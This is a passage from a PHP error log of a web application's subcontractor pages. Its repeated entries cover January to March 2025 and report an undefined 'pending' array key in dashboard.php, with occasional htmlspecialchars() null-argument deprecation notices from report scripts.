/home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Jan-2025 13:39:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [19-Jan-2025 09:43:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [19-Jan-2025 12:05:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [19-Jan-2025 19:53:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [19-Jan-2025 21:39:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [19-Jan-2025 22:09:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [19-Jan-2025 22:47:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [19-Jan-2025 23:47:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 00:21:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 02:18:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 03:58:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 03:59:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 04:21:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 05:41:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 07:10:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 10:30:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 21:32:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Jan-2025 23:00:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 00:29:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 00:50:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 00:51:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 02:23:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 02:53:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 03:39:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 04:15:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 04:21:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 05:19:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 05:36:15 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 06:44:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 07:31:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 11:25:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 11:42:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 22:39:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Jan-2025 23:26:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 00:04:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 00:40:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 01:07:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 01:29:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 02:42:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 02:58:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 04:00:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 04:01:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 04:15:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 05:13:32 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 07:16:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 12:30:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 16:24:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 16:26:05 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 16:27:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 22:06:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 22:10:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 22:17:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 22:40:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 23:43:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 23:48:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [22-Jan-2025 23:49:01 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [22-Jan-2025 23:49:01 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [22-Jan-2025 23:51:03 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 01:34:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 03:01:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 03:09:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 04:34:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 06:25:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 07:25:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 09:29:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 12:13:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 12:45:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 23:06:41 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 23:16:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 23:32:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Jan-2025 23:34:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 00:49:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 01:35:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 02:25:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 02:28:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 02:28:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 02:28:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 03:44:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 03:53:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 04:16:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 05:00:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 05:22:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 05:35:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 05:35:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 05:35:32 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 05:36:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 05:49:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 06:15:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 06:53:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 07:10:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 07:12:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 10:37:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Jan-2025 11:07:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [25-Jan-2025 01:22:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [25-Jan-2025 01:27:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [26-Jan-2025 05:20:15 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Jan-2025 10:31:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Jan-2025 10:58:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Jan-2025 20:22:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Jan-2025 23:46:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Jan-2025 23:54:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 02:03:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 02:09:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 02:59:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 03:09:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 04:21:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 04:52:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 05:27:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 05:31:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 05:46:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 05:53:07 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 05:53:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 05:54:15 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [28-Jan-2025 05:54:15 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [28-Jan-2025 05:54:53 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [28-Jan-2025 05:54:53 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [28-Jan-2025 05:55:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [28-Jan-2025 05:55:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [28-Jan-2025 06:08:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 06:26:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 07:24:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 09:28:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 09:33:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 16:27:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 16:32:23 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 16:32:59 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [28-Jan-2025 16:32:59 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [28-Jan-2025 16:33:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [28-Jan-2025 16:33:09 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [28-Jan-2025 16:33:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [28-Jan-2025 16:33:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [28-Jan-2025 16:34:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [28-Jan-2025 16:34:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [28-Jan-2025 16:34:15 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [28-Jan-2025 16:34:15 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [28-Jan-2025 16:34:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 16:35:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 16:37:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 16:40:05 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 16:44:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 20:52:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [29-Jan-2025 01:20:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [29-Jan-2025 02:12:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [29-Jan-2025 02:56:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [29-Jan-2025 03:12:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [29-Jan-2025 04:48:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [29-Jan-2025 05:32:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [30-Jan-2025 00:14:41 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [30-Jan-2025 00:15:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [30-Jan-2025 04:04:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [31-Jan-2025 04:22:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Feb-2025 09:16:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [12-Feb-2025 00:39:03 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [12-Feb-2025 02:42:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [18-Feb-2025 05:33:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Feb-2025 00:14:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Feb-2025 00:43:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Feb-2025 11:43:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Feb-2025 23:12:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Feb-2025 00:59:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Feb-2025 11:49:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Feb-2025 05:24:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Mar-2025 21:47:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Mar-2025 01:10:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Mar-2025 01:11:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Mar-2025 01:12:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Mar-2025 01:13:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Mar-2025 01:13:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [18-Mar-2025 00:21:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [18-Mar-2025 04:31:04 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [18-Mar-2025 05:43:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [18-Mar-2025 22:36:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Mar-2025 01:10:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Mar-2025 01:48:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Mar-2025 01:48:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Mar-2025 06:13:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Mar-2025 07:38:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Mar-2025 07:50:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Mar-2025 07:59:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Mar-2025 08:19:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Mar-2025 10:19:53 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Mar-2025 11:28:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Mar-2025 14:12:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Mar-2025 23:59:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Mar-2025 07:23:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Mar-2025 07:25:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Mar-2025 07:52:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Mar-2025 07:54:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Mar-2025 08:31:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Mar-2025 09:27:32 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [25-Mar-2025 04:40:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 00:36:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 00:37:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 02:08:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 02:13:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 03:02:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 03:19:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 03:24:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 03:25:21 UTC] PHP Warning: Undefined array key "pending" in 